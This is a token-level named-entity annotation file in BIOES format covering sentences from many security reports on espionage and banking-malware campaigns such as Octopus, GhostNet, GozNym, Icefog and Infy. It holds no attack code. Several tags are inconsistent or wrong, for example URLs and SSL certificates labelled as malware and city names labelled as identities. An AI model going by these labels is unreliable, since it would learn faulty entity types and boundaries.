O + +In O +this O +blogpost O +we O +cover O +a O +malicious O +program O +for O +Windows S-OS +called O +Octopus S-MAL +that O +mostly O +targets O +diplomatic B-IDTY +entities E-IDTY +. O + +We O +also O +started O +monitoring O +the O +malware O +and O +, O +using O +Kaspersky S-SECTEAM +Attribution O +Engine O +based O +on O +similarity O +algorithms O +, O +discovered O +that O +Octopus S-MAL +is O +related O +to O +DustSquad O +, O +something O +we O +reported O +in O +April B-TIME +2018 E-TIME +. O + +From O +early O +2014 S-TIME +until O +December B-TIME +2018 E-TIME +, O +ns0.idm.net.lb O +pointed O +to O +194.126.10.18 O +, O +which O +appropriately O +enough O +is O +an O +Internet O +address O +based O +in O +Lebanon O +. O + +Kaspersky B-SECTEAM +Lab E-SECTEAM +products O +detect O +the O +Octopus B-MAL +Trojan E-MAL +as O +Trojan.Win32.Octopus.gen E-MAL +. O + +Political B-IDTY +entities E-IDTY +in O +Central O +Asia O +have O +been O +targeted O +throughout O +2018 S-TIME +by O +different O +actors O +, O +including O +IndigoZebra S-APT +, O +Sofacy S-APT +( O +with O +Zebrocy S-MAL +malware S-MAL +) O +and O +most O +recently O +by O +DustSquad O +( O +with O +Octopus S-MAL +malware S-MAL +) O +. O + +El O +Machete O +is O +one O +of O +these O +threats O +that O +was O +first O +publicly O +disclosed O +and O +named O +by O +Kaspersky S-SECTEAM +here O +. O + +We've O +found O +that O +this O +group O +has O +continued O +to O +operate O +successfully O +, O +predominantly O +in O +Latin B-LOC +America E-LOC +, O +since O +2014 S-TIME +. O + +All O +attackers O +simply O +moved O +to O +new O +C2 S-TOOL +infrastructure O +, O +based O +largely O +around O +dynamic B-ACT +DNS I-ACT +domains E-ACT +, O +in O +addition O +to O +making O +minimal O +changes O +to O +the O +malware O +in O +order O +to O +evade O +signature-based O +detection O +. 
O + +In O +the O +case O +of O +Octopus S-MAL +, O +DustSquad O +used O +Delphi O +as O +their O +programming O +language O +of O +choice O +, O +which O +is O +unusual O +for O +such O +an O +actor O +. O + +Targets O +included O +a O +wide O +array O +of O +high-profile O +entities O +, O +including O +intelligence B-IDTY +services E-IDTY +, O +military S-IDTY +, O +utility B-IDTY +providers E-IDTY +( O +telecommunications S-IDTY +and O +power S-IDTY +) O +, O +embassies S-IDTY +, O +and O +government B-IDTY +institutions E-IDTY +. O + +Some O +time O +ago O +, O +a O +Kaspersky B-SECTEAM +Lab E-SECTEAM +customer O +in O +Latin B-LOC +America E-LOC +contacted O +us O +to O +say O +he O +had O +visited O +China S-LOC +and O +suspected O +his O +machine O +was O +infected O +with O +an O +unknown O +, O +undetected O +malware O +. O + +It O +was O +a O +targeted B-ACT +attack E-ACT +we O +are O +calling O +" O +Machete O +" O +. O + +At O +first O +look O +, O +it O +pretends O +to O +be O +a O +Java B-MAL +related I-MAL +application E-MAL +but O +after O +a O +quick O +analysis O +, O +it O +was O +obvious O +this O +was O +something O +more O +than O +just O +a O +simple O +Java B-FILE +file E-FILE +. O + +" O +Machete O +" O +is O +a O +targeted B-ACT +attack I-ACT +campaign E-ACT +with O +Spanish S-LOC +speaking O +roots O +. O + +The O +decoy B-MAL +slideshows E-MAL +all O +contain O +photos O +from O +very O +meaningful O +events O +to O +individuals O +in O +Thailand S-LOC +, O +suggesting O +that O +the O +actors O +continually O +look O +for O +impactful O +events O +to O +use O +to O +disguise O +their O +attacks O +. O + +In O +some O +cases O +, O +such O +as O +Russia S-LOC +, O +the O +target O +appears O +to O +be O +an O +embassy S-IDTY +from O +one O +of O +the O +countries O +of O +this O +list O +. 
O + +Both O +attackers O +and O +victims O +speak O +Spanish S-LOC +natively O +, O +as O +we O +see O +it O +consistently O +in O +the O +source O +code O +of O +the O +client O +side O +and O +in O +the O +Python S-TOOL +code O +. O + +We O +are O +also O +grateful O +to O +the O +Private O +Office O +of O +his O +Holiness O +the O +Dalai O +Lama O +, O +the O +Tibetan O +Government-in-Exile O +, O +the O +missions O +of O +Tibet S-IDTY +in O +London O +, O +Brussels S-IDTY +, O +and O +New O +York O +, O +and O +Drewla S-IDTY +( O +a O +Tibetan S-IDTY +NGO S-IDTY +) O +. O + +Between O +June B-TIME +2008 E-TIME +and O +March B-TIME +2009 E-TIME +the O +Information B-TOOL +Warfare I-TOOL +Monitor E-TOOL +conducted O +an O +extensive O +and O +exhaustive O +two-phase O +investigation O +focused O +on O +allegations O +of O +Chinese B-LOC +cyber E-LOC +espionage O +against O +the O +Tibetan B-IDTY +community E-IDTY +. O + +These O +instances O +of O +Gh0st B-MAL +RAT E-MAL +are O +consistently O +controlled O +from O +commercial O +Internet O +access O +accounts O +located O +on O +the O +island B-LOC +of I-LOC +Hainan E-LOC +, O +People's B-IDTY +Republic E-IDTY +of O +China S-LOC +. O + +The O +fieldwork O +generated O +extensive O +data O +that O +allowed O +us O +to O +examine O +Tibetan B-IDTY +information I-IDTY +security I-IDTY +practices E-IDTY +, O +as O +well O +as O +capture O +real-time O +evidence O +of O +malware O +that O +had O +penetrated O +Tibetan S-IDTY +computer O +systems O +. O + +It O +is O +therefore O +possible O +that O +the O +large O +percentage O +of O +high O +value O +targets O +identified O +in O +our O +analysis O +of O +the O +GhostNet S-ACT +are O +coincidental O +, O +spread O +by O +contact O +between O +individuals O +who O +previously O +communicated O +through O +e-mail S-TOOL +. O + +Where O +they O +exist O +, O +they O +often O +use O +grey B-MAL +market E-MAL +or O +pirated B-MAL +software E-MAL +. 
O + +Contextually O +relevant O +emails S-TOOL +are O +sent O +to O +specific O +targets O +with O +attached O +documents S-FILE +that O +are O +packed O +with O +exploit S-VULNAME +code O +and O +Trojan S-MAL +horse O +programmes O +designed O +to O +take O +advantage O +of O +vulnerabilities O +in O +software O +installed O +on O +the O +target O +'s O +computer O +. O + +GhostNet S-ACT +represents O +a O +network O +of O +compromised O +computers O +resident O +in O +high-value O +political S-IDTY +, O +economic S-IDTY +, O +and O +media S-IDTY +locations O +spread O +across O +numerous O +countries O +worldwide O +. O + +After O +that O +, O +the O +attacker O +is O +capable O +to O +control O +the O +compromised B-ACT +device E-ACT +. O + +The O +computers O +of O +diplomats S-IDTY +, O +military B-IDTY +attachés E-IDTY +, O +private B-IDTY +assistants E-IDTY +, O +secretaries S-IDTY +to O +Prime B-IDTY +Ministers E-IDTY +, O +journalists S-IDTY +and O +others O +are O +under O +the O +concealed O +control O +of O +unknown O +assailant O +. O + +The O +C&C S-TOOL +server O +( O +82.137.255.56 S-IP +) O +used O +by O +the O +above O +backdoors O +was O +used O +by O +APT-C-27 S-APT +( O +Goldmouse S-APT +) O +many O +times O +since O +2017 O +. O + +According O +to O +360 B-SECTEAM +Threat I-SECTEAM +Intelligence I-SECTEAM +Center E-SECTEAM +, O +Goldmouse O +was O +observed O +deploying O +the O +nebulous O +njRAT B-MAL +backdoor E-MAL +. O + +The O +banking O +malware O +GozNym S-MAL +has O +legs O +; O +only O +a O +few O +weeks O +after O +the O +hybrid O +Trojan S-MAL +was O +discovered O +, O +it O +has O +reportedly O +spread O +into O +Europe O +and O +begun O +plaguing O +banking B-IDTY +customers E-IDTY +in O +Poland O +with O +redirection B-ACT +attacks E-ACT +. O + +The O +APT O +group O +is O +reportedly O +targeting O +the O +Middle B-LOC +East E-LOC +region O +. 
O + +The O +malware O +has O +started O +targeting O +corporate O +, O +SMB S-MAL +, O +investment B-IDTY +banking E-IDTY +and O +consumer O +accounts O +at O +banks S-IDTY +, O +including O +some O +in O +Portugal O +and O +the O +U.S. S-LOC +, O +in O +addition O +to O +Poland S-LOC +, O +according O +to O +researchers O +at O +IBM B-SECTEAM +'s I-SECTEAM +X-Force E-SECTEAM +team O +. O + +According O +to O +Kessem S-SECTEAM +the O +malware O +has O +redirection O +instructions O +for O +17 O +banks S-IDTY +, O +and O +features O +an O +additional O +230 O +URLs O +to O +assist O +attackers O +in O +targeting O +community B-IDTY +banks E-IDTY +and O +email B-IDTY +service I-IDTY +providers E-IDTY +in O +Poland S-LOC +. O + +With O +GozNym S-MAL +, O +attackers O +dupe O +users O +by O +showing O +them O +the O +actual O +bank S-IDTY +'s O +URL S-MAL +and O +SSL B-MAL +certificate E-MAL +. O + +Fresh O +from O +targeting O +banks S-IDTY +in O +Poland S-LOC +, O +the O +banking S-IDTY +Trojan S-MAL +GozNym S-MAL +has O +begun O +taking O +aim O +at O +banks S-IDTY +in O +Germany S-LOC +. O + +Attackers O +went O +on O +to O +use O +the O +Trojan S-MAL +to O +steal O +$4 O +million O +from O +24 O +banks S-IDTY +, O +including O +22 O +in O +the O +United B-LOC +States E-LOC +and O +two O +in O +Canada S-LOC +, O +in O +just O +two O +weeks O +. O + +Recreating O +and O +maintaining O +fake O +bank S-IDTY +sites O +can O +be O +an O +arduous O +task O +, O +but O +Kessem S-SECTEAM +claims O +the O +GozNym O +group O +appears O +up O +to O +the O +task O +. O + +The O +malware O +is O +distributed O +primarily O +through O +laced B-ACT +spam E-ACT +emails S-TOOL +that O +lure O +recipients O +into O +opening O +attachments O +. O + +Kessem S-SECTEAM +. O + +Fresh O +from O +targeting O +banks S-IDTY +in O +Poland S-LOC +, O +the O +banking S-IDTY +Trojan S-MAL +has O +reportedly O +begun O +taking O +aim O +at O +banks S-IDTY +in O +Germany S-LOC +. 
O + +Now O +GozNym S-MAL +is O +now O +targeting O +13 O +banks S-IDTY +and O +subsidiaries S-IDTY +in O +Germany S-LOC +, O +Limor O +Kessem S-SECTEAM +, O +Executive B-SECTEAM +Security E-SECTEAM +Advisor O +at O +IBM S-SECTEAM +, O +said O +Tuesday S-TIME +. O + +he O +Trojan S-MAL +, O +a O +hybrid O +of O +Nymaim S-MAL +and O +Gozi S-MAL +malware S-MAL +, O +initially O +formed O +in O +April O +and O +thrives O +on O +carrying O +out O +redirection B-ACT +attacks E-ACT +via O +DNS B-ACT +poisoning E-ACT +. O + +In O +April S-TIME +, O +shortly O +after O +the O +Trojan S-MAL +'s O +discovery O +, O +researchers O +observed O +a O +massive O +GozNym B-ACT +campaign E-ACT +targeting O +24 O +North B-LOC +American E-LOC +banks S-IDTY +. O + +The O +method O +, O +which O +technically O +redirects O +users O +through O +local O +DNS B-ACT +poisoning E-ACT +, O +requires O +a O +fair O +bit O +of O +work O +; O +recreating O +and O +maintaining O +fake O +bank S-IDTY +sites O +can O +be O +an O +arduous O +task O +, O +but O +Kessem S-SECTEAM +claims O +the O +group O +behind O +GozNym S-MAL +– O +Nymaim O +– O +appear O +up O +to O +the O +task O +. O + +Attackers O +behind O +Dyre O +have O +used O +similar O +tactics O +in O +the O +past O +but O +have O +only O +deployed O +their O +attacks O +in O +English O +speaking O +countries O +and O +Spain S-LOC +. O + +When O +we O +last O +heard O +from O +the O +Trojan S-MAL +, O +its O +operators O +were O +seen O +launching O +redirection B-ACT +attacks E-ACT +on O +four O +large O +, O +U.S. S-LOC +banks S-IDTY +in O +June S-TIME +. O + +The O +fact O +that O +the O +cybercriminals O +behind O +GozNym S-MAL +have O +already O +adapted O +the O +Trojan S-MAL +for O +three O +different O +languages O +and O +in O +countries O +which O +have O +different O +banking O +systems O +is O +unique O +, O +according O +to O +Kessem S-SECTEAM +. 
O + +By O +the O +end B-TIME +of I-TIME +April E-TIME +, O +GozNym S-MAL +had O +redirection O +instructions O +for O +17 O +Polish O +banks S-IDTY +in O +its O +repertoire O +, O +along O +with O +an O +extra O +230 O +URLs O +designed O +to O +assist O +attackers O +in O +targeting O +community B-IDTY +banks E-IDTY +and O +email B-IDTY +service I-IDTY +providers E-IDTY +in O +the O +Eastern S-LOC +European S-LOC +country O +. O + +Seeking O +to O +tease O +out O +any O +possible O +links O +between O +Operation B-ACT +Aurora E-ACT +, O +VOHO S-ACT +, O +Operation B-ACT +DeputyDog E-ACT +, O +and O +Ephemeral B-ACT +Hydra E-ACT +, O +we O +began O +with O +Symantec S-SECTEAM +'s O +Hidden O +Lynx O +report O +as O +our O +foundation O +. O + +The O +authors O +of O +that O +report O +identify O +three O +primary O +tools O +used O +in O +the O +campaigns S-ACT +attributed O +to O +Hidden O +Lynx O +: O +Trojan.Naid S-MAL +, O +Backdoor.Moudoor S-FILE +, O +and O +Backdoor.Hikit S-MAL +. O + +We O +will O +detail O +how O +the O +C&C S-TOOL +infrastructure O +and O +tools O +used O +by O +hacker O +group O +Hidden B-APT +Lynx E-APT +during O +its O +VOHO B-ACT +campaign E-ACT +( O +2012 S-TIME +) O +, O +excellently O +documented O +by O +Symantec S-SECTEAM +researchers O +last O +September S-TIME +, O +overlap O +with O +tools O +used O +in O +other O +high O +profile O +operations O +during O +the O +past O +few O +years O +. O + +When O +the O +New B-IDTY +York I-IDTY +Times E-IDTY +and O +Mandiant S-SECTEAM +last B-TIME +year E-TIME +unmasked O +a O +large O +scale O +Chinese O +hacking O +operation O +, O +pinpointing O +its O +location O +down O +to O +the O +building O +, O +the O +report O +drew O +mainstream O +attention O +to O +what O +security O +professionals O +already O +well O +knew O +: O +sophisticated O +threat O +actors O +carry O +out O +persistent O +cyber O +operations O +over O +months O +and O +years O +. 
O + +By O +the O +end B-TIME +of I-TIME +April E-TIME +, O +GozNym S-MAL +had O +redirection O +instructions O +for O +17 O +Polish O +banks S-IDTY +in O +its O +repertoire O +, O +along O +with O +an O +extra O +230 O +URLs O +designed O +to O +assist O +attackers O +in O +targeting O +community B-IDTY +banks E-IDTY +and O +email B-IDTY +service I-IDTY +providers E-IDTY +in O +the O +Eastern B-LOC +European E-LOC +country O +. O + +Using O +Recorded O +Future O +, O +we O +quickly O +built O +a O +timeline O +of O +the O +reported O +use O +of O +those O +tools O +in O +major O +security O +incidents O +, O +finding O +many O +events O +prior O +to O +the O +early O +2013 S-TIME +exposé O +on O +Hidden B-APT +Lynx E-APT +. O + +In O +particular O +, O +FireEye S-SECTEAM +during O +the O +fall O +of O +2013 S-TIME +called O +out O +infrastructure O +overlap O +between O +Ephemeral O +Hydra O +and O +DeputyDog S-MAL +. O + +The O +above O +network O +shows O +relationships O +between O +three O +tools O +used O +by O +Hidden O +Lynx O +during O +its O +VOHO B-ACT +campaign E-ACT +: O +Trojan.Naid S-MAL +, O +Backdoor.Moudoor S-FILE +, O +and O +Backdoor.Hikit S-MAL +. O + +Symantec S-SECTEAM +during O +2012 S-TIME +linked O +the O +Elderwood B-ACT +Project E-ACT +to O +Operation B-ACT +Aurora E-ACT +; O +Trojan.Naid S-MAL +and O +Backdoor.Moudoor S-FILE +were O +also O +used O +in O +Aurora S-MAL +, O +by O +the O +Elderwood B-APT +Gang E-APT +, O +and O +by O +Hidden B-APT +Lynx E-APT +. O + +In O +addition O +to O +these O +, O +we O +also O +identified O +" O +Macfog S-MAL +" O +, O +a O +native B-MAL +Mac I-MAL +OS I-MAL +X I-MAL +implementation E-MAL +of O +Icefog S-MAL +that O +infected O +several O +hundred O +victims O +worldwide O +. 
O + +Icefog S-APT +, O +also O +known O +as O +the O +" O +Dagger B-APT +Panda E-APT +" O +by O +Crowdstrike S-SECTEAM +'s O +naming O +convention O +, O +infected O +targets O +mainly O +in O +South B-LOC +Korea E-LOC +and O +Japan E-LOC +. O + +In O +2013 S-TIME +, O +a O +public O +report O +reveals O +a O +group O +of O +actors O +conducted O +targeted B-ACT +attacks E-ACT +leverage O +a O +malware O +dubbed O +ICEFOG S-MAL +against O +mainly O +government B-IDTY +organizations E-IDTY +and O +defense B-IDTY +industry E-IDTY +of O +South B-LOC +Korea E-LOC +and O +Japan S-LOC +. O + +Similar O +to O +our O +approach O +with O +Symantec S-SECTEAM +'s O +report O +on O +Hidden O +Lynx O +, O +we O +used O +Recorded O +Future O +to O +organize O +the O +technical O +details O +about O +the O +DeputyDog B-ACT +attacks E-ACT +to O +reveal O +technical O +information O +described O +in O +the O +open O +source O +reporting O +across O +multiple O +campaigns S-ACT +. O + +With O +Javafog O +, O +we O +are O +turning O +yet O +another O +page O +in O +the O +Icefog S-MAL +story O +by O +discovering O +another O +generation O +of O +backdoors O +used O +by O +the O +attackers O +. O + +Since O +January B-TIME +2013 E-TIME +, O +we've O +been O +on O +the O +lookout O +for O +a O +possible O +RedOctober S-APT +comeback O +. O + +One O +possible O +hit O +was O +triggered O +when O +we O +observed O +Mevade O +, O +an O +unusual O +piece O +of O +malware O +that O +appeared O +late O +in O +2013 S-TIME +. O + +In O +August B-TIME +2014 E-TIME +, O +some O +of O +our O +users O +observed O +targeted B-ACT +attacks E-ACT +with O +a O +variation O +of O +CVE-2012-0158 S-VULID +and O +an O +unusual O +set O +of O +malware O +. O + +It O +wasn't O +until O +August B-TIME +2014 E-TIME +that O +we O +observed O +something O +which O +made O +us O +wonder O +if O +RedOctober O +is O +back O +for O +good O +. 
O + +The O +Cloud O +Atlas O +implants O +utilize O +a O +rather O +unusual O +C&C B-ACT +mechanism E-ACT +. O + +We O +named O +it O +RedOctober O +because O +we O +started O +this O +investigation O +in O +October B-TIME +2012 E-TIME +, O +an O +unusually O +hot O +month O +. O + +The O +attackers O +upload O +data O +to O +the O +account O +, O +which O +is O +downloaded O +by O +the O +implant O +, O +decrypted O +and O +interpreted O +. O + +Just O +like O +with O +RedOctober S-APT +, O +the O +top O +target O +of O +Cloud O +Atlas O +is O +Russia S-LOC +, O +followed O +closely O +by O +Kazakhstan O +, O +according O +to O +data O +from O +the O +Kaspersky B-SECTEAM +Security I-SECTEAM +Network E-SECTEAM +( O +KSN S-SECTEAM +) O +. O + +In O +May B-TIME +2015 E-TIME +, O +Palo B-SECTEAM +Alto I-SECTEAM +Networks I-SECTEAM +WildFire E-SECTEAM +detected O +two O +e-mails S-TOOL +carrying O +malicious O +documents O +from O +a O +genuine O +and O +compromised O +Israeli O +Gmail O +account O +, O +sent O +to O +an O +Israeli S-LOC +industrial B-IDTY +organization E-IDTY +. O + +One O +e-mail S-TOOL +carried O +a O +Microsoft B-TOOL +PowerPoint E-TOOL +file O +named O +" O +thanks.pps S-FILE +" O +( O +VirusTotal S-TOOL +) O +, O +the O +other O +a O +Microsoft B-TOOL +Word E-TOOL +document O +named O +" O +request.docx S-FILE +" O +. O + +Around O +the O +same O +time O +, O +WildFire S-SECTEAM +also O +captured O +an O +e-mail S-TOOL +containing O +a O +Word S-TOOL +document O +( O +" O +hello.docx S-FILE +" O +) O +with O +an O +identical O +hash O +as O +the O +earlier O +Word S-TOOL +document O +, O +this O +time O +sent O +to O +a O +U.S. S-LOC +Government S-IDTY +recipient O +. O + +attacks O +using O +this O +tool O +were O +still O +active O +as O +of O +April B-TIME +2016 E-TIME +. 
O + +Considering O +the O +language O +being O +used O +in O +the O +malicious O +code O +is O +Arabic O +, O +it O +seems O +that O +the O +attacker O +is O +familiar O +with O +Arabic O +language O +as O +well O +. O + +The O +initially-observed O +" O +thanks.pps S-FILE +" O +example O +tricks O +the O +user O +into O +running O +the O +embedded O +file O +named O +ins8376.exe S-FILE +which O +loads O +a O +payload O +DLL S-TOOL +named O +mpro324.dll S-FILE +. O + +In O +this O +case O +, O +the O +file O +used O +the O +software O +name O +" O +Cyberlink S-FILE +" O +, O +and O +a O +description O +of O +" O +CLMediaLibrary O +Dynamic B-TOOL +Link I-TOOL +Library E-TOOL +" O +and O +listing O +version O +4.19.9.98 O +. O + +Unit B-SECTEAM +42 E-SECTEAM +published O +a O +blog O +at O +the O +beginning O +of O +May O +titled O +" O +Prince O +of O +Persia O +" O +, O +in O +which O +we O +described O +the O +discovery O +of O +a O +decade-long O +campaign O +using O +a O +formerly O +unknown O +malware O +family O +, O +Infy S-MAL +, O +that O +targeted O +government S-IDTY +and O +industry S-IDTY +interests O +worldwide O +. O + +We O +noted O +in O +our O +original O +blog O +the O +large O +amount O +of O +targeting O +of O +Iranian S-LOC +citizens S-IDTY +in O +this O +campaign O +, O +we O +observed O +almost O +one-third O +of O +all O +victims O +to O +be O +Iranian O +. O + +In O +addition O +to O +the O +original O +" O +Infy S-MAL +" O +variant O +, O +we O +also O +see O +the O +newer O +, O +more O +sophisticated O +, O +interactive O +, O +and O +fuller-featured O +" O +Infy B-MAL +M E-MAL +" O +variant O +deployed O +against O +apparently-higher-value O +targets O +. 
O + +This O +documentation O +provides O +new O +insight O +into O +intrusion O +efforts O +conducted O +by O +at O +least O +four O +discrete O +Iranian B-LOC +threat I-LOC +actors E-LOC +, O +Rocket B-APT +Kitten E-APT +, O +Infy S-APT +, O +Sima S-APT +, O +and O +Operation B-ACT +Cleaver E-ACT +, O +including O +groups O +and O +tools O +that O +have O +not O +been O +previously O +disclosed O +. O + +Since O +early O +2013 S-TIME +, O +we O +have O +observed O +activity O +from O +a O +unique O +threat O +actor O +group O +, O +which O +we O +began O +to O +investigate O +based O +on O +increased O +activities S-ACT +against O +human O +right O +activists S-IDTY +in O +the O +beginning O +of O +2015 S-TIME +. O + +Over O +the O +course O +of O +three O +years O +of O +observation O +of O +campaigns S-ACT +targeting O +civil B-IDTY +society E-IDTY +and O +human B-IDTY +rights I-IDTY +organizations E-IDTY +, O +from O +records O +of O +well O +over O +two O +hundred O +spearphishing S-ACT +and O +other O +intrusion O +attempts O +against O +individuals O +inside O +of O +Iran S-LOC +and O +in O +the O +diaspora S-IDTY +, O +a O +narrative O +of O +persistent O +intrusion O +efforts O +emerges O +. O + +Thanks O +to O +information O +we O +have O +been O +able O +to O +collect O +during O +the O +course O +of O +our O +research O +, O +such O +as O +characteristics O +of O +the O +group O +'s O +malware O +and O +development O +cycle O +, O +our O +research O +strongly O +supports O +the O +claim O +that O +the O +Infy B-APT +group E-ACT +is O +of O +Iranian B-LOC +origin E-LOC +and O +potentially O +connected O +to O +the O +Iranian B-LOC +state E-LOC +. 
O + +Amongst O +a O +backdrop O +of O +other O +incidents O +, O +Infy O +became O +one O +of O +the O +most O +frequently O +observed O +agents O +for O +attempted O +malware B-ACT +attacks E-ACT +against O +Iranian O +civil B-IDTY +society E-IDTY +beginning O +in O +late B-TIME +2014 E-TIME +, O +growing O +in O +use O +up O +to O +the O +February B-TIME +2016 E-TIME +parliamentary O +election B-LOC +in I-LOC +Iran E-LOC +. O + +Until O +the O +publication O +of O +the O +Palo B-SECTEAM +Alto E-SECTEAM +report O +, O +the O +developers O +of O +the O +Infy S-MAL +appeared O +to O +be O +actively O +updating O +and O +maintaining O +the O +codebase O +, O +and O +new O +releases O +were O +distributed O +to O +existing O +, O +as O +well O +as O +new O +, O +targets O +quite O +regularly O +. O + +Other O +samples O +were O +found O +bearing O +a O +compilation O +time O +as O +early O +as O +June B-TIME +2012 E-TIME +and O +version O +00002 O +. O + +Over O +the O +months O +following O +the O +elections O +, O +the O +accounts O +of O +Iranians S-IDTY +that O +had O +been O +compromised O +by O +the O +actors O +were O +then O +used O +for O +spreading O +the O +malware O +. O + +When O +activities S-ACT +targeting O +of O +civil B-IDTY +society E-IDTY +subsided O +, O +the O +actors O +instead O +appeared O +to O +have O +focused O +on O +external O +targets O +, O +such O +a O +series O +of O +attempts O +to O +spearphish S-ACT +the O +Danish O +Ministry O +of O +Foreign O +Affairs O +. O + +Palo B-SECTEAM +Alto I-SECTEAM +Networks E-SECTEAM +has O +noted O +and O +described O +the O +differences O +of O +two O +malware O +agents O +developed O +in O +parallel O +, O +with O +commonalities O +in O +behavior O +but O +differing O +functionalities O +; O +families O +described O +as O +Infy S-MAL +and O +Infy B-MAL +M. 
E-MAL +Our O +primary O +observation O +was O +of O +the O +Infy S-MAL +( O +non-M S-MAL +) O +malware S-MAL +, O +which O +primarily O +functions O +as O +a O +keylogger S-MAL +for O +the O +collection O +of O +account O +credentials O +. O + +Our O +observation O +of O +Infy O +'s O +campaigns S-ACT +, O +primarily O +through O +the O +lens O +of O +spearphishing B-ACT +attacks E-ACT +against O +Iranian O +civil B-IDTY +society E-IDTY +and O +media B-IDTY +organizations E-IDTY +, O +indicates O +a O +wandering O +focus O +on O +particular O +demographics O +on O +a O +strategic O +basis O +over O +time O +. O + +The O +Infy S-MAL +malware S-MAL +was O +seen O +targeting O +Iranians S-IDTY +again O +in O +June B-TIME +2015 E-TIME +, O +when O +it O +was O +shared O +with O +researchers O +after O +being O +sent O +to O +a O +broadcast B-IDTY +journalist E-IDTY +at O +BBC B-IDTY +Persian E-IDTY +with O +a O +generic O +introduction O +and O +a O +PowerPoint S-TOOL +presentation O +attached O +titled O +" O +Nostalogy O +" O +( O +sic O +) O +. O + +Based O +on O +information O +collected O +in O +the O +course O +of O +this O +research O +, O +the O +targets O +and O +victims O +of O +Infy O +'s O +campaigns S-ACT +have O +continued O +to O +be O +strongly O +aligned O +with O +Iran S-LOC +'s O +" O +soft O +war O +" O +agenda O +, O +internal O +security O +policies O +, O +and O +regional O +adversaries O +of O +the O +hardline O +establishment O +of O +the O +Islamic B-LOC +Republic I-LOC +of I-LOC +Iran E-LOC +. 
O + +Until O +late O +December B-TIME +2015 E-TIME +, O +in O +nearly O +every O +Infy B-MAL +message E-MAL +documented O +since O +our O +tracking O +began O +in O +May B-TIME +2013 E-TIME +, O +no O +attempt O +included O +strong O +tailoring O +of O +the O +approach O +, O +often O +not O +even O +including O +an O +email S-ACT +body O +, O +instead O +relying O +on O +cryptic O +filenames O +and O +email S-ACT +subjects O +to O +attract O +interest O +. O + +One O +narrowly-targeted O +spearphishing S-ACT +from O +Infy O +was O +sent O +from O +the O +compromised O +account O +of O +a O +political B-IDTY +activist E-IDTY +promoting O +participation O +inside O +of O +Iran S-LOC +, O +claiming O +to O +be O +a O +set O +of O +images O +of O +a O +British-Iranian S-IDTY +dual O +national O +that O +has O +been O +held O +in O +Evin O +Prison O +for O +five O +years O +on O +espionage O +charges O +. O + +As O +in O +the O +past O +, O +these O +messages O +have O +been O +sent O +accounts O +believed O +to O +be O +fake O +and O +accounts O +compromised O +by O +Infy O +, O +including O +Kurdish B-IDTY +activists E-IDTY +that O +had O +previously O +been O +compromised O +by O +the O +Flying B-APT +Kitten I-APT +actor I-APT +group E-APT +. O + +The O +actors O +successfully O +compromised O +a O +host O +of O +an O +Saudi S-LOC +government B-IDTY +institutions E-IDTY +on O +January B-TIME +17 E-TIME +, O +2016 S-TIME +, O +and O +maintained O +access O +for O +at O +least O +two O +weeks O +. O + +The O +Infy B-APT +group E-APT +also O +appears O +to O +engage O +in O +espionage B-ACT +activities E-ACT +against O +foreign O +governments S-IDTY +and O +businesses S-IDTY +. O + +In O +order O +to O +initially O +compromise O +the O +designated O +targets O +, O +Infy O +typically O +distributed O +specifically-crafted O +malicious B-ACT +documents I-ACT +containing E-ACT +Infy S-MAL +through O +spearphishing B-ACT +attacks E-ACT +. 
O + +In O +order O +to O +initially O +compromise O +the O +designated O +targets O +, O +the O +attackers O +typically O +distributed O +specifically-crafted O +malicious B-ACT +documents I-ACT +containing E-ACT +Infy S-MAL +through O +spearphishing B-ACT +attacks E-ACT +. O + +On O +May B-TIME +2 E-TIME +, O +2016 S-TIME +, O +Palo B-SECTEAM +Alto I-SECTEAM +Networks E-SECTEAM +published O +the O +report O +" O +Prince O +of O +Persia O +" O +, O +which O +provided O +the O +first O +public O +and O +widely-reported O +indication O +of O +Infy S-APT +'s O +activities S-ACT +in O +Iran S-LOC +, O +while O +other O +publications O +either O +refrained O +from O +making O +the O +association O +or O +were O +not O +openly O +available O +. O + +Prior O +to O +the O +distribution O +of O +new O +versions O +of O +the O +agent O +, O +the O +Infy S-MAL +developers O +appear O +to O +consistently O +conduct O +tests O +from O +local O +hosts O +, O +which O +indicates O +that O +the O +control O +and O +maintenance O +of O +the O +software O +occurs O +in O +the O +Khorasan O +Razavi O +province O +of O +Iran S-LOC +, O +potentially O +in O +the O +city O +of O +Mashhad S-LOC +. O + +On O +May B-TIME +2 E-TIME +, O +2016 S-TIME +, O +Palo B-SECTEAM +Alto E-SECTEAM +published O +the O +report O +" O +Prince O +of O +Persia O +" O +, O +which O +provided O +the O +first O +public O +and O +widely-reported O +indication O +of O +Infy O +'s O +activities S-ACT +in O +Iran S-LOC +, O +while O +other O +publications O +either O +refrained O +from O +making O +the O +association O +or O +were O +not O +openly O +available O +. O + +Only O +one O +client O +, O +based O +in O +Iran S-LOC +, O +continued O +to O +communicate O +with O +the O +infrastructure O +. 
O + +A O +researcher O +has O +attributed O +a O +recently O +publicized O +attack O +on O +Citrix' S-IDTY +internal O +network O +to O +the O +Iranian-linked B-LOC +group E-LOC +known O +as O +IRIDIUM O +– O +and O +said O +that O +the O +data O +heist O +involved O +6 O +terabytes O +of O +sensitive O +data O +. O + +" O +IRIDIUM O +has O +hit O +more O +than O +200 O +government B-IDTY +agencies E-IDTY +, O +oil S-IDTY +and O +gas B-IDTY +companies E-IDTY +and O +technology B-IDTY +companies E-IDTY +, O +including O +Citrix B-IDTY +Systems I-IDTY +Inc E-IDTY +" O +, O +they O +said O +. O + +Citrix S-IDTY +told O +Threatpost O +that O +this O +is O +indeed O +the O +same O +password-spraying B-ACT +attack E-ACT +it O +announced O +itself O +last O +week O +– O +but O +it O +wouldn't O +confirm O +the O +other O +details O +in O +Resecurity S-SECTEAM +'s O +post O +, O +including O +the O +attribution O +. O + +In O +wake O +of O +these O +events O +, O +a O +security B-IDTY +firm E-IDTY +Resecurity S-SECTEAM +reached O +out O +to O +NBC O +news O +and O +claimed O +that O +they O +had O +reasons O +to O +believe O +that O +the O +attacks O +were O +carried O +out O +by O +Iranian-linked B-LOC +group E-LOC +known O +as O +IRIDIUM O +. O + +Resecurity S-SECTEAM +says O +that O +IRIDIUM O +" O +has O +hit O +more O +than O +200 O +government B-IDTY +agencies E-IDTY +, O +oil S-IDTY +and O +gas B-IDTY +companies E-IDTY +, O +and O +technology B-IDTY +companies E-IDTY +including O +Citrix S-IDTY +. O + +Resecurity S-SECTEAM +claims O +that O +IRIDIUM O +breached O +Citrix S-IDTY +'s O +network O +during O +December B-TIME +2018 E-TIME +. 
